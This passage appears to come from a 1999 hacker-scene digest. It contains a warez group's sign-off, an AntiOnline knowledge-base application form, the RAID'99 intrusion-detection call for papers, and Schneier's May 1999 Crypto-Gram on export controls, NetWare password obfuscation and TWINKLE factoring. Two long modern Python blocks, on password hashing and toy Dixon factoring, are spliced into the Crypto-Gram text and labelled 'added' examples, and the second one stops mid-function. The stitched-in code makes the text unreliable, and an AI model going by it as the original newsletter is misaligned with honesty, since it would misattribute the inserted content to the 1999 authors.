So st4y t00n3d ph0r the BoW Nine Return of the Hack K0m3b4ck Sp3kt4kul4r,
and pr3p4re t0 3nter PH34R N4T10N@!#$!!#$$%!&
SiGN3D:
The BoW Imperial Senate:
U4EA / LISTER / PLUVIUS / SW_R / THE DEADKENNEDY
THE VELKRO KODE WARRIOR / D-CELLERATION TRAUMA
RATSCABIES / KIAD / THE 0WN3D R4NGER
K-Rad BoW Affiliates:
K0D3Z / ANuS / H4G1S / THE Y0RKSH1R3 P0SS3 / GLuE
MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY
(K) Kopywrong
__________ __ __ ____ ________ ________ ________
\______ \ ____/ \ / \ /_ / __ \/ __ \/ __ \
| | _// _ \ \/\/ / | \____ /\____ /\____ /
| | ( <_> ) / | | / / / / / /
|______ /\____/ \__/\ / |___| /____/ /____/ /____/
\/ \/
distribute everywhere
Spreading the Zeroday Your Way since 1992
The Few, The Pr0ud, Th3 pheared. The BoW.
THE BROTHERHOOD OF WAREZ
www.velkro.net
bow@velkro.net
MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY
END 0F TR4NZM1ZZi0N...
PHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOW
@HWA
37.0 AntiOnline opens up its knowledge database to the pheds
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Seen via HNS http://www.net-security.org/
Knowledge Base Applications
Monday, May 17, 1999 at 23:06:28
by John Vranesevich - Founder of AntiOnline
AntiOnline is pleased to announce that it is now taking
applications for access to its knowledge base. Access to this
area of AntiOnline will be restricted to military and federal
law enforcement personnel only.
The knowledge base will provide resources and information
which AntiOnline feels is too sensitive to make available to the
general public as a whole.
In order to gain access to this area of AntiOnline, users are
required to fill out and sign the application below, and fax it to
the AntiOnline offices (724-773-0941) on official letterhead.
AntiOnline will turn over any instances of suspected falsification
of records, or any individuals who are suspected of
impersonating a federal authority to the proper agencies for
investigation.
Please Note: Due to high demand, it may take up to 4 weeks to
activate an account.
Official Request For Access
AntiOnline's Knowledge Base
An Interface To The "Omnipotent One" Intelligence System
Last Name: __________________________________
First Name: __________________________________
Affiliation: ___________________________________
Rank/Title: ___________________________________
City or APO or FPO: _____________________________________
State or APO/FPO: _______________________________________
Zip Code: _____________________
Commercial Phone: _______________________________________
Commercial FAX: _________________________________________
Official E-mail Address: __________________________________
In order to ensure the continued security of the Knowledge Base,
AntiOnline requires you to access the system from a static IP
address. Furthermore, this address must reverse-resolve back
to the organization that you are officially affiliated with.
IP Address: ________________________
Address Resolves To: ________________________________
End Page One - Initial Here: _____
To allow AntiOnline staff members to contact you about your account in
a secure way, we require that you register your Public PGP Key with
AntiOnline's Public Key Server. Details on how to do this are located at
http://www.antionline.com/resources/pgp-key-server/ The key must be
registered under the official e-mail address that you listed above. If your
organization prohibits the use of PGP Encryption, make a note of it below:
PGP Comments: ______________________________________________
I understand that the information contained within AntiOnline's Knowledge Base is considered sensitive.
I hereby attest that any information that I obtain from said knowledge base will not be distributed to any third party, with the exception of:
1. any individual affiliated with my organization that I am directly assigned to work with on an official basis.
2. any information which I am subpoenaed or otherwise required to turn over to a court of law as part of a civil or criminal proceeding.
I hereby attest that the above information that I provided about myself, the organization that I am affiliated with and its policies, is accurate to the best of my knowledge.
I hereby attest that the letterhead which this FAX was originally printed on is the official letterhead of the organization that I am affiliated with, and that I am using it on an official basis in accordance with the policies and procedures set forth to me by said organization.
Signed: _________________________________
Print Name: _____________________________
Initial: ________
@HWA
38.0 [ISN] RAID99 Hosted by CERIAS Call for papers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Return-Path: <owner-isn@repsec.com>
Date: Sun, 16 May 1999 04:00:28 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] RFP -- Upcoming workshop hosted by CERIAS: RAID'99
Message-ID: <Pine.SUN.3.96.990516035955.29238C-100000@flatland.dimensional.com>
X-NoSpam: You do not have consent to spam me.
X-Attrition: Attrition is only good when forced. http://www.attrition.org
X-Copyright: This e-mail copyright 1999 by jericho@dimensional.com where applicable
X-Encryption: rot26
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-isn@repsec.com
Precedence: bulk
Reply-To: cult hero <jericho@dimensional.com>
x-unsubscribe: echo "unsubscribe isn" | mail majordomo@repsec.com
x-infosecnews: x-loop, procmail, etc
Forwarded From: spaf@cs.purdue.edu
We're hosting this important workshop in intrusion detection. The
deadline for submissions is fast approaching, so we'd like to remind you
all to consider making a submission.
Call For Participation - RAID'99
Second International Workshop on the
Recent Advances in Intrusion Detection
Dates: September 7-9, 1999
West Lafayette, Indiana, USA
An HTML version of this CFP is available at
http://www.zurich.ibm.com/pub/Other/RAID
Corporate Sponsors:
The SANS Institute
IBM Business Recovery Services
Emergency Response Service
This workshop, the second in an ongoing annual series, will bring
together leading figures from academia, government, and industry to
discuss state-of-the-art intrusion detection technologies, and
paradigms and issues from the research and commercial perspectives.
The RAID International Workshop series is intended to further progress
in intrusion detection by promoting the exchange of ideas in a broad
range of topics among researchers, system developers, and users and by
encouraging links between these groups. RAID'98, held in
Louvain-la-Neuve, Belgium, was the first in an anticipated annual
series of international workshops that has brought together leading
figures from academia, government, and industry to ponder the current
state of intrusion detection technologies and paradigms from the
research and commercial perspectives. More than 130 participants
attended RAID'98, with nearly 50% from outside Europe, reflecting the
international nature of the meeting.
RAID'99 is being hosted by the Purdue University CERIAS, in West
Lafayette, Indiana, USA. The program committee invites submission of
both technical and general interest papers and panels from those
interested in formally presenting their ideas during the
workshop. This year, we are emphasizing the following topic areas:
Assessing IDS
  - Accuracy and reliability measurements, requirements, and technologies
  - Benchmarking techniques and technologies
  - Relations to Risk Assessment and Risk Management Plans
IDS in High Performance and Real-Time Environments
  - Large-scale/enterprise IDS
  - High-Speed networks
  - Managing high-volume data
  - Highly distributed and heterogeneous environments
Vulnerabilities and Attacks
  - New vulnerability or attack databases
  - Vulnerability or attack taxonomies
  - Using vulnerability databases
IDS Integration
  - IDS interoperability Standards and Standardization - progress and assessment
  - Integration with the system/network management framework
  - Combining different "styles" of IDS
Innovative Approaches
  - Adaptive IDS solutions
  - Survivability and Dependability
  - Data mining, intelligent agents
  - New results related to innovative ways of thinking about IDS, new IDS
    methodologies and technologies
  - Automated responses
  - Combining IDS and system/network management
Practical Considerations
  - Case studies
  - IDS in heterogeneous environments
  - Unique/emerging IDS operating environments, including CORBA, NT,
    X.509 and VPN.
  - Legal issues (IDS reports as "evidence")
  - Commercial intrusion detection systems and their directions
  - Real-time versus Post-mortem IDS
  - IDS integration with business process
Program Committee
*****************
General Chair: Gene Spafford (Purdue University, USA)
Program Chair: Deborah Frincke (University of Idaho, USA)
Program Co-Chair: Ming-Yuh Huang (Boeing Applied Research and
Technology, USA)
Executive Committee
*******************
Marc Dacier (IBM Zurich Research Laboratory, Switzerland)
Kathleen Jackson (Los Alamos National Laboratory, USA)
Committee Members
*****************
Matt Bishop (University of California at Davis, USA)
Dick Brackney (National Security Agency, USA)
Yves Deswarte (LAAS-CNRS & INRIA, France)
Terry Escamilla (IBM, USA)
Rowena Chester (University of Tennessee, USA)
Tim Grance (National Institute of Standards and Technology, USA)
Sokratis Katsikas (University of the Aegean, Greece)
Baudouin Le Charlier (Universite de Namur, Belgium)
Abdelaziz Mounji (Universite de Namur, Belgium)
Jean-Jacques Quisquater (Universite Catholique de Louvain, Belgium)
Marv Schaefer (Arca Systems, USA)
Mark Schneider (National Security Agency, USA)
Steve Smaha (Free Agent, USA)
Peter Sommer (London School of Economics & Political Science, England)
Stuart Staniford-Chen (Silicon Defense, USA)
Chris Wee (University of California at Davis, USA)
Kevin Ziese (Cisco/Wheelgroup, USA)
SUBMISSIONS
===========
Papers and panels which fall into the topic areas outlined above are
particularly welcome, although contributions outside those topics may
also be of interest. Each submission must contain:
1. A separate title page with:
The type of submission,
The title or topic,
The topic category most appropriate for the subject matter;
The name(s) of the speaker or panel chair and probable panelists,
with their organizational affiliation(s), telephone and FAX numbers,
postal address, and Internet electronic mail address.
2. A brief biography of each author or panel participant as appropriate
3. The subject category (see topic list) most appropriate for the
paper or panel
Paper submissions must include an abstract that is a maximum of 600
words in length on a separate page. This abstract may be accompanied by
a lengthier paper, which should be no more than ten pages (12 point
font). Although encouraged, it is not necessary to submit a full paper
for consideration as a speaker or for inclusion in the proceedings;
however, potential speakers providing full paper submissions will be
given preference in cases of equal quality. The program committee will
allocate each accepted presenter up to 30 minutes for the talk, based
on the complexity and interest of the proposed topic and the wishes of
the speaker. The presenter will be informed of the presentation slot
length when notified of acceptance.
Panel submissions must include a description that is a maximum of 300
words. The description should include both an outline of the format of
the panel and a short rationale for the panel. The program committee
will allocate one to two-hour time slots to each panel, based on the
proposed topic, the number of panelists, and the wishes of the panel
chair. The panel chair will be informed of the slot length when
notified of acceptance. Panels which include time for general
discussion and questions/answers for the panelists and the attendees
are preferred to those which do not.
All proposals must be in English. Plan to give all panels and talks in
English.
All submissions must be received on or before May 21. We strongly
prefer they be submitted electronically to raid99@zurich.ibm.com or
raid99@cs.uidaho.edu using one of these formats: ASCII, postscript,
Word, or LaTex. All abstracts will be made available on the web. For
those submitting full papers, these submissions should be in a format
which can be translated to PDF. Full papers will also be made
available on the web, and possibly by CD-ROM. If necessary, hardcopy
may be sent to the nearest of the following locations (please allow
sufficient time for arrival by May 21):
European Collection Site
Marc Dacier
Global Security Analysis Lab
IBM Zurich Research Laboratory
Saeumerstrasse 4 CH-8803
Rueschlikon Switzerland
North/South American Collection Site
Ming-Yuh Huang
The Boeing Company
P.O. Box 3707 MC 7L-20
Seattle WA 98124-2207
U.S.A.
Each submission will be acknowledged by e-mail. If acknowledgment is
not received within seven days, please contact raid99@cs.uidaho.edu.
A preliminary program will be available at the RAID web site,
http://www.zurich.ibm.com/pub/Other/RAID/, by July 21, 1999. Last
year's proceedings are available online as well.
CORPORATE SPONSORS
==================
We solicit interested organizations to become sponsors for RAID '99,
particularly in sponsorship of student travel and other expenses for
RAID. Please contact Deborah Frincke for information regarding
corporate sponsorship of RAID.
REGISTRATION
============
Detailed registration information (including fees, suggested hotels,
and travel directions) will be provided at the RAID'99 web site.
PROCEEDINGS
===========
On-line workshop proceedings will be posted on the RAID web site
immediately following the workshop. It will include:
The final program;
A list of corporate sponsors;
A list of attendees (subject to each attendee's approval);
The submitted abstract and slides used by each speaker;
The submitted description and rationale for each panel;
The slides used by each panelist; and,
Written position statements from each panelist.
Last year's most outstanding workshop participants were invited to
submit an analogous formal paper to a special RAID edition of the
refereed journal "Computer Networks and ISDN Systems." Proceedings
from last year may be found online at
http://www.zurich.ibm.com/pub/Other/RAID/.
IMPORTANT DATES
===============
Deadline for paper, panel submission    May 21, 1999
Notification of acceptance or rejection July 7, 1999
Registration opens                      July 15, 1999
Preliminary program posted to web       July 15, 1999
Final full paper due (optional)         August 7, 1999
On-time Registration closes             August 21, 1999
RAID dates                              September 7-9, 1999
FOR MORE INFORMATION
====================
For further information:
On-site arrangements:
contact Gene Spafford (spaf@cs.purdue.edu)
General program information or corporate sponsorship:
contact Deborah Frincke (frincke@cs.uidaho.edu)
Paper and panel submission:
contact Ming-Yuh Huang (huang@bcstec.ca.boeing.com)
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
39.0 Cryptogram May 15th'99
~~~~~~~~~~~~~~~~~~~~~~
CRYPTO-GRAM
May 15, 1999
by Bruce Schneier
President
Counterpane Systems
schneier@counterpane.com
http://www.counterpane.com
A free monthly newsletter providing summaries, analyses, insights, and
commentaries on cryptography and computer security.
Back issues are available at http://www.counterpane.com. To subscribe or
unsubscribe, see below.
Copyright (c) 1999 by Bruce Schneier
** *** ***** ******* *********** *************
In this issue:
The Internationalization of Cryptography
News
Federal Appeals Court Agrees that Encryption Export
Rules are Unconstitutional
The Doghouse -- Novell NetWare's Remote Passwords
U.S. Crypto Legislation Update
Counterpane Systems News
Factoring with TWINKLE
Comments from Readers
** *** ***** ******* *********** *************
The Internationalization of Cryptography
One of the stranger justifications of U.S. export controls is that they
prevent the spread of cryptographic expertise. Years ago, the
Administration argued that there were no cryptographic products available
outside the U.S. When several studies proved that there were hundreds of
products designed, built, and marketed outside the U.S., the Administration
changed its story. These products were all no good, they argued. Export
controls prevent superior American products from getting into foreign
hands, forcing them to use inferior non-U.S. products.
Nonsense.
Cryptography is an international science. Most of the cryptographic
conferences are held outside the U.S. Most of the cryptography
researchers are at universities outside the U.S., and most cryptographic
papers presented at conferences are written outside the U.S. There are
more advanced degree programs in cryptography outside the U.S. than there
are inside. Researchers outside the U.S. tend to be better funded, and
there is more interest in their work. Some of the most important
cryptographic research ideas in the past ten years have come from outside
the U.S. The U.S. not only does not have a lock on cryptographic research,
it does not even have the majority.
In 1997, NIST solicited algorithms for the Advanced Encryption Standard, to
replace DES as a government encryption standard. Of the fifteen
submissions received, ten were from companies and universities outside the
U.S: Australia, Belgium, Canada, Costa Rica, England, France, Germany,
Israel, Japan, Korea. Of the five submissions likely to be chosen for the
next round, about half will be from outside the U.S. It is very possible
that the next U.S. government encryption standard will have been designed
outside the U.S.
The Internet Engineering Task Force has created a series of cryptographic
standards for the Internet: secure e-mail, encrypted and authenticated IP
packets, secure socket-level communications, key exchange and certificate
formats, etc. These meetings are held several times a year, mostly in the
U.S. but also outside. Attendees are from companies all over the world,
and the standards are written by international consensus. The U.S. has no
lock on the content of the standards, nor the evaluation process. These
standards are implemented in products built all over the world, not just in
the U.S. For example, a Finnish company called SSH has one of the best
IPSec -- a standard for IP security -- implementations in the world.
Other non-U.S. technology has been integrated into U.S. companies. A
Swedish company called COST built a comprehensive cryptographic toolkit.
The company was acquired by Entegrity Solutions, Inc., a U.S. startup.
Algorithmic Research, and its cryptographic products, was acquired by
Cylink Corp. ELVIS+, a Russian company, is now part of the U.S. company
TrustWorks, Inc. RSA Data Security, now owned by Security Dynamics Inc.,
recently purchased the rights to a cryptographic product created in
Australia. This list goes on and on. Again and again, U.S. companies have
realized that cryptographic expertise is available outside the U.S., and
have taken steps to secure that expertise.
Cryptography does not stop at national borders. Research, standards, and
products are international. Expertise is international. For the U.S.
Administration to believe that there are "national secrets" about
cryptography that export controls somehow keep inside the U.S. is sheer
folly. There is no evidence that this is true, and considerable evidence
that the reverse is true.
** *** ***** ******* *********** *************
News
Cyberwar is becoming real, maybe. It seems that hackers in Belgrade have
attacked NATO's public Web server. Now there's a big difference between
attacking a Web site and attacking actual war-fighting computers, but still...
http://www.pcworld.com/cgi-bin/pcwtoday?ID=10358
See also:
http://www.zdnet.com/zdnn/stories/news/0,4586,2220773,00.html
And hackers have done damage in protest of NATO's accidental bombing of
the Chinese embassy in Belgrade. A number of U.S. government sites were
hacked, including those of the Department of the Interior, the Department
of Energy, and the U.S. embassy in China.
http://www.zdnet.com/zdnn/stories/news/0,4586,2256138,00.html
This item is more interesting, if it's true. According to this news
report, which I can't confirm anywhere, the Serbs used a CIA mobile phone
and security identification codes to call in a NATO air strike on a
civilian convoy.
http://www.theherald.co.uk/news/archive/19-4-1999-0-9-58.html
More credible is the story that the Serbs are eavesdropping on NATO
unencrypted radio links.
http://www.washingtonpost.com/wp-srv/WPlate/1999-05/01/169l-050199-idx.html
A cat lost an English bus company a £20,000 contract after falling asleep
on a fax machine and sending confidential information to a rival firm.
http://www.telegraph.co.uk/et?ac=000647321007942&rtmo=Q9Qw9p3R&atmo=KKKKKKrM&pg=/et/99/4/19/ncat19.html
KeyNote v2, a toolkit for handling trust management issues, has been
released in beta. KeyNote is a small, flexible trust management system
designed by Matt Blaze, Joan Feigenbaum, and others, suitable for
Internet-style applications.
KeyNote description:
ftp://ftp.research.att.com/dist/mab/knrfc.txt
Beta release of the KeyNote toolkit:
http://www.cis.upenn.edu/~angelos/keynote.html
Crypto++ 3.1, a free C++ crypto class library, has just been released.
This version fixes some bugs and adds more AES candidates as well as a
couple of MAC constructions based on block ciphers.
http://www.eskimo.com/~weidai/cryptlib.html
Starium will soon be selling voice encryption add-ons for telephones.
They'll be using 2048-bit Diffie-Hellman for key exchange, and triple-DES
for voice encryption. Price will be around $100. And unlike AT&T, these
guys probably won't bend to government pressure to add key escrow to their
protocols (remember Clipper).
http://www.starium.com
See also:
http://www.eetimes.com/story/OEG19990423S0015
This is a terrifying one. A U.S.-led international organization of police
and security agencies is trying to push through laws to mandate
eavesdropping points for Web sites and other forms of digital
communication. "The plans require the installation of a network of tapping
centers throughout Europe, operating almost instantly across all national
boundaries, providing access to every kind of communications including the
net and satellites. A German tapping center could intercept Internet
messages in Britain, or a British detective could listen to Dutch phone
calls. There could even be several tapping centers listening in at once.
The full story:
http://www.heise.de/tp/english/special/enfo/6398/1.html
Another story:
http://www.newsunlimited.co.uk/The_Paper/Weekly/Story/0,3605,45981,00.html
Also see:
http://www.heise.de/tp/english/special/enfo/6397/1.html
The document is Enfopol 19, a restricted document leaked to the
London-based Foundation for Information Policy Research:
http://www.fipr.org/polarch/index.html
Cool Internet Explorer security bugs:
Someone else using your computer can see where you've been browsing.
Someone else using your computer can access your password-protected Web sites.
http://www.zdnet.com/anchordesk/story/story_3351.html
http://www.zdnet.com/zdnn/stories/news/0,4586,1014586,00.html
Think computer privacy is a problem? Here's how it works in the real
world. This was originally published in the 14 March 1999 New York Times
magazine section.
http://archives.nytimes.com/archives/search/fastweb?getdoc+allyears2+db365+325093+0+wAAA+fiber-optic%7Econfessional
Visa has issued a draft of the "Visa Smart Card Protection Profile," as
part of the Common Criteria. It contains a very nice list of smart card
attacks. The document is a draft, and they want comments.
http://www.visa.com/nt/chip/accept.html
http://jya.com/drpp-v.pdf
The Visa document references the Common Criteria:
http://csrc.ncsl.nist.gov/cc/
The IC2000 report on communications interception and ECHELON, the U.S.
satellite surveillance network, was approved as a working document by the
Science and Technology Options Assessment Panel of the European Parliament
(STOA) at their meeting in Strasbourg on 6 May 1999. The document is
public, and very interesting.
Report:
http://www.iptvreports.mcmail.com/stoa_cover.htm
http://jya.com/ic2000.zip
News story:
http://www.wired.com/news/news/politics/story/19602.html
A man has been sentenced to seven and one half years for hacking $6M out of
slot machines.
http://www.wired.com/news/news/technology/story/19433.html
** *** ***** ******* *********** *************
Federal Appeals Court Agrees that Encryption
Export Rules are Unconstitutional
The story so far: Dan Bernstein wanted to publish the details and source
code to Snuffle, an algorithm of his. Export rules prevented him from
doing so. He took this to court. About a year and a half ago, Judge Patel
agreed with him and ruled the export rules unconstitutional. The
government requested a stay, which was granted. The case was appealed to
the Federal Ninth Circuit Court of Appeals...
...which just agreed with Judge Patel's decision.
Briefly, the Court agreed that source code can be (though isn't always)
"expressive," and thus qualifies as speech for the purpose of the First
Amendment. Thus, the Export Administration Regulations (EAR) is a prior
restraint on free speech. While such things can be legal, they bear a
heavy burden; EAR does not meet that burden, because (among other things)
it grants unbridled discretion to the government, it provides no firm time
limits for the process, and it bars judicial review.
Despite the fact that their reasoning was narrowly focused on expressive
source code, they struck down the entire rule on crypto export because the
rule doesn't distinguish between expressive source, functional source, and
object code, and they can't (and shouldn't) do a line-by-line rewrite of
the EAR. They also said that government efforts to control cryptography,
in addition to being a First Amendment issue, may also be in conflict with
the Fourth Amendment, the right to speak anonymously, the right against
compelled speech, and the right to informational privacy.
This does not mean that it is suddenly legal to export cryptography out of
the U.S. Judge Patel issued declaratory and injunctive relief, but it was
almost immediately stayed. The Ninth Circuit Court of Appeals affirmed her
decision, but that Court's mandate does not issue until the time for
petitioning for rehearing runs (14 days). This will almost undoubtedly be
stayed, as the government asks the Supreme Court to hear the case. The
conservative among us will wait before exporting source code.
Wired articles:
http://www.wired.com/news/news/politics/story/19553.html?wnpg=1
http://www.wired.com/news/news/politics/story/19571.html
http://www.wired.com/news/news/politics/story/19605.html
The decision:
http://jya.com/bernstein-9th.htm
An excellent summary and analysis:
http://www.law.miami.edu/~froomkin/bernstein99.htm
** *** ***** ******* *********** *************
The Doghouse -- Novell NetWare's Remote Passwords
Novell NetWare 5 (and 4.11 and 4.2) has a feature that allows
administrators to remotely manage Novell servers. These administrative
accounts are protected by passwords, and the passwords are encrypted on the
servers. Unfortunately, the encryption algorithm doesn't work.
According to a hacker named TheRuiner, the password file is only protected
with some obfuscation, bit realignment, subtraction, value substitution,
and an XOR cipher. It's pretty trivial to break, and all it really took
was for someone to reverse-engineer the code and see exactly how it worked.
This isn't rocket science, guys. Password protection is a solved problem:
use a strong hash function. I'm not sure why Novell wasn't paying attention.
News story:
http://www.infoworld.com/cgi-bin/displayNew.pl?/security/990426sw.htm
Details are at:
http://oliver.efri.hr/~crv/security/bugs/Others/nware12.html
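To make the "use a strong hash function" point concrete, here is an added example (it is not Novell's code and not the scheme TheRuiner reversed; the obfuscation routine is a constructed toy built from the same ingredients the story lists: value substitution, subtraction, and XOR with a fixed key). The toy is reversible by anyone who has the constants, which necessarily ship with the software; the hardened version beside it stores a salted, iterated PBKDF2-HMAC-SHA256 digest, so the stored record cannot be turned back into the password and can only be checked by recomputation.

```python
import hashlib
import hmac
import os

# ---- Constructed toy: reversible "encryption" of a stored password ----
# Assumption: key and substitution table are fixed constants embedded in the
# software, which is the situation the article describes. Not Novell's algorithm.
TOY_KEY = b"\x5a\x3c\x7e\x19"
SUBST = bytes((i * 7 + 3) % 256 for i in range(256))  # bijection: gcd(7, 256) == 1
INV_SUBST = bytearray(256)
for _plain, _sub in enumerate(SUBST):
    INV_SUBST[_sub] = _plain


def toy_obfuscate(password: bytes) -> bytes:
    """Value substitution, position-dependent subtraction, then XOR with a fixed key."""
    out = bytearray()
    for i, b in enumerate(password):
        s = SUBST[b]                        # value substitution
        s = (s - i) % 256                   # subtraction
        s ^= TOY_KEY[i % len(TOY_KEY)]      # XOR "cipher" with an embedded key
        out.append(s)
    return bytes(out)


def toy_deobfuscate(blob: bytes) -> bytes:
    """Every step above is invertible using only the embedded constants: no secret is needed."""
    out = bytearray()
    for i, b in enumerate(blob):
        s = b ^ TOY_KEY[i % len(TOY_KEY)]
        s = (s + i) % 256
        out.append(INV_SUBST[s])
    return bytes(out)


# ---- Hardened form: salted, iterated one-way hash ----
ITERATIONS = 100_000  # tune upward as hardware allows


def hash_password(password: bytes, salt: bytes = None) -> str:
    """Store algorithm, iteration count, salt and digest; the password itself is not recoverable."""
    if salt is None:
        salt = os.urandom(16)               # per-password random salt defeats precomputed tables
    digest = hashlib.pbkdf2_hmac("sha256", password, salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(stored: str, candidate: bytes) -> bool:
    """Recompute the digest with the stored parameters and compare in constant time."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported record format")
    digest = hashlib.pbkdf2_hmac("sha256", candidate, bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    blob = toy_obfuscate(b"admin-pass")
    print("toy record recovers plaintext:", toy_deobfuscate(blob))
    record = hash_password(b"admin-pass")
    print("hashed record:", record)
    print("verify correct:", verify_password(record, b"admin-pass"))
    print("verify wrong:  ", verify_password(record, b"guess"))
```

The contrast is the whole lesson: the toy scheme's only "key" is a constant inside the program, so reverse-engineering the code is equivalent to recovering every stored password, whereas the hashed record gives an attacker nothing to invert and forces one expensive PBKDF2 computation per guess.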
** *** ***** ******* *********** *************
U.S. Crypto Legislation Update
Once again, the U.S. Congress is trying to enact legislation to relax
export controls on computer hardware and software that include encryption.
The hope is that actual laws will eventually replace the ITAR regulations,
which are not laws and have never been voted on.
On March 24, the House Judiciary Committee approved H.R. 850, the "Security
And Freedom through Encryption" (SAFE) Act. We like this bill; it
generally relaxes export controls on encryption software. On the minus
side, it also includes a controversial provision that creates a new
criminal offense for using encryption during a crime. But on the plus
side, the Committee rejected an attempt by Rep. Bill McCollum (R-FL) to
introduce an amendment that would have limited relaxation to those
encryption products that have key-escrow (or whatever they are calling it
these days).
The bill is sponsored by Congressman Robert Goodlatte (R-VA) and
Congresswoman Zoe Lofgren (D-CA) (both great people who deserve our
support) and currently has 251 co-sponsors, including the Republican and
Democrat leaders. Republican leaders sent a "Dear Colleague" letter to all
members of Congress last week urging passage of the bill. Unfortunately,
it has now been referred to the Commerce, International Relations, Armed
Services, and Intelligence Committees for further review. If you remember
back to 1997, the House Armed Services and Intelligence Committees both
revised a similar bill -- at the request of the FBI -- to impose
restrictions on crypto products; their efforts to pass that gutted bill
were defeated with help from industry and public interest groups. Majority
Leader Dick Armey has told Rep. Goodlatte that he expects the legislation
to be voted on by the House by summer; we'll have to wait and see.
There is also some progress in the Senate this year. In a surprising
turnaround, Senator John McCain (R-AZ) has reversed his previous support
for domestic encryption restrictions and introduced a bill to slightly
relax export controls. His new bill, S. 798, "Promote Reliable On-Line
Transactions to Encourage Commerce and Trade" (PROTECT) Act of 1999 relaxes
export controls on products with 64-bit keys or less. Restrictions are
also relaxed on publicly traded companies, regulated or regularly audited
companies (such as banks or insurance companies), subsidiaries of U.S.
companies and strategic partners, online merchants, and governments in
NATO, OECD and ASEAN (a weird choice).
Products that have longer keys than 64 bits can be exported if a new
Encryption Export Advisory Board and the Secretary of Commerce approve the
exports after finding that "the product or service is...generally
available, publicly available; or an encryption product utilizing the same
or greater key length or otherwise providing comparable security is, or
will be within the next 12 months generally or widely available outside the
United States from a foreign supplier." Decisions will be subject to
judicial review.
The bill requires the National Institute of Standards and Technology to
finish the Advanced Encryption Standard (AES) selection by January 1, 2002.
After the AES is selected, products that incorporate the AES or have an
equivalent strength may be exportable without a license in most cases.
The bill also prohibits mandatory access to encryption keys or key recovery
information by the United States government or the government of any state.
However, it also contains provisions that require NIST to assist law
enforcement in enhancing access to cryptography and intrusion detection
systems.
The bill has been referred to the Senate Commerce Committee, where Senator
McCain is Chairman. It is also co-sponsored by Senators Leahy (D-VT),
Burns (R-MT), Kerry (D-MA), Abraham (R-MI), and Wyden (D-OR).
It promises to be an interesting year in Congress.
SAFE Act:
http://thomas.loc.gov/cgi-bin/query/z?c106:H.R.850.IH:
PROTECT ACT:
http://thomas.loc.gov/cgi-bin/query/z?c106:S.798.IS:
(This article was co-written with David Banisar.)
** *** ***** ******* *********** *************
Counterpane Systems News
Rootfest '99. Bruce Schneier will be speaking at RootFest, a hackers'
convention on 21-23 May 1999, in Minneapolis.
http://www.rootfest.org/
NetSec '99. At 8:00 AM on 15 June, Bruce Schneier will give the keynote
speech at NetSec '99 in St. Louis. Schneier will also be speaking about
securing legacy applications at 2:00 that afternoon.
http://www.gocsi.com/conf.htm
** *** ***** ******* *********** *************
Factoring with TWINKLE
At Eurocrypt '99, Adi Shamir presented a new machine that could increase
our factoring speed by about 100-1000 times. Called TWINKLE (The Weizmann
INstitute Key Locating Engine), this device brings 512-bit keys within the
realm of our ability to factor.
The best factoring algorithms known to date all work on similar principles.
First, there is a massive parallel search for equations with a certain
relation. This is known as the sieving step. Then, after a certain number
of relations are found, there is a massive matrix operation to solve a
linear equation and produce the prime factors. The first step can easily
be parallelized -- recently, 200 computers worked in parallel for about four
weeks to find relations to help factor RSA-140 -- but the second has to be
done on a single supercomputer: it took a large Cray about 100 hours and
810 Mbytes of memory to factor RSA-140.
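The two-step structure described above (a sieving step that collects relations, then a matrix step that combines them) is easiest to see on a toy scale. The following is an added example, not from Crypto-Gram or Shamir's paper: a miniature Dixon-style factoring routine that searches for x with x^2 mod n smooth over a small factor base, runs Gaussian elimination over GF(2) on the exponent parities to find a subset whose product is a perfect square, and then takes a gcd to split n. The numbers, factor-base bound and relation count are constructed for illustration; TWINKLE only accelerates the first function, which is the article's point.

```python
from math import gcd, isqrt


def small_primes(limit):
    """Primes up to limit (the factor base), by a plain Eratosthenes sieve."""
    flags = bytearray([1]) * (limit + 1)
    flags[0] = flags[1] = 0
    for i in range(2, isqrt(limit) + 1):
        if flags[i]:
            flags[i * i::i] = bytearray(len(range(i * i, limit + 1, i)))
    return [i for i, f in enumerate(flags) if f]


def smooth_exponents(m, factor_base):
    """Exponent vector of m over the factor base, or None if m has a larger prime factor."""
    exps = []
    for p in factor_base:
        e = 0
        while m % p == 0:
            m //= p
            e += 1
        exps.append(e)
    return exps if m == 1 else None


def sieving_step(n, factor_base, wanted):
    """Collect relations x^2 = y (mod n) with y smooth over the factor base.
    This is the embarrassingly parallel part (and what TWINKLE speeds up);
    here we simply walk x upward from sqrt(n)."""
    relations = []
    x = isqrt(n) + 1
    while len(relations) < wanted and x < n:
        y = x * x % n
        if y:
            exps = smooth_exponents(y, factor_base)
            if exps is not None:
                relations.append((x, exps))
        x += 1
    return relations


def matrix_step(relations):
    """Gaussian elimination over GF(2) on exponent-parity vectors.
    Returns bitmasks of relation subsets whose combined exponents are all even."""
    pivots = {}          # lowest set bit -> (reduced row, which relations it combines)
    dependencies = []
    for i, (_, exps) in enumerate(relations):
        row = sum(1 << j for j, e in enumerate(exps) if e & 1)
        combo = 1 << i
        while row:
            low = row & -row
            if low not in pivots:
                pivots[low] = (row, combo)
                break
            prow, pcombo = pivots[low]
            row ^= prow
            combo ^= pcombo
        if row == 0:
            dependencies.append(combo)
    return dependencies


def congruence_of_squares(n, relations, factor_base, combo):
    """Multiply the chosen relations into x^2 = y^2 (mod n), y built from half the exponents."""
    x, total = 1, [0] * len(factor_base)
    for i, (xi, exps) in enumerate(relations):
        if combo >> i & 1:
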